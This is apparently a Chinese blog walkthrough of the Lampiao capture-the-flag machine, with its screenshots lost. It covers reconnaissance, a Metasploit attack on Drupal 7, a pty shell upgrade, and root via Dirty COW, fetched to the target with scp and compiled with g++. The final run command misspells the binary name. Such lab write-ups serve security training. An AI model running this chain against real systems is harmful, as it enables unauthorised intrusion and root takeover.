方法一:
1.nmap扫描存活主机并确认靶机,我的是153
Lampiao
Lampiao
2.扫描开放端口
Lampiao

3.先访问1898端口,发现是个网站
Lampiao
4.用nikto扫描一下网站用那些目录或文件
Lampiao
访问UPGRADE.txt,提示升级drupal的信息
Lampiao
Drupal7有一个远程执行漏洞
5.用msfconsole工具进行攻击
1.搜索模块
Lampiao
2.使用模块
3.查看并设置选项
Lampiao
6.攻击

6.得到shell
在meterpreter >后加shell得到shell,在添加python -c ‘import pty; pty.spawn("/bin/bash")’
在创建完成后,我们此时就可以运行su命令了。(并且界面提示也变得更加友好)

7.提权
1.查看靶机内核版本uname -a
Lampiao
2.用./linux-exploit-suggester.sh查看可以攻击的脚本
Lampiao
我们选择dirtycow2攻击
用searchapolit进行搜索40847.cpp这个攻击脚本,将这件脚本复制到桌面,
再用scp上传到靶机scp [email protected]:/root/Desktop/40847.cpp ./
编译cpp文件:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
./docw -s 即可得到root权限
Lampiao

相关文章:

  • 2021-10-27
  • 2022-12-23
  • 2022-01-20
猜你喜欢
  • 2021-07-03
  • 2021-11-29
  • 2021-09-28
  • 2022-12-23
  • 2021-05-20
  • 2021-08-15
相关资源
相似解决方案